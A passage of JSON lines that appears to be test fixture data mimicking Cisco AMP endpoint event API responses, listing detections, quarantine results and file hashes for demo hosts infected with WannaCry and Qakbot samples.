pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 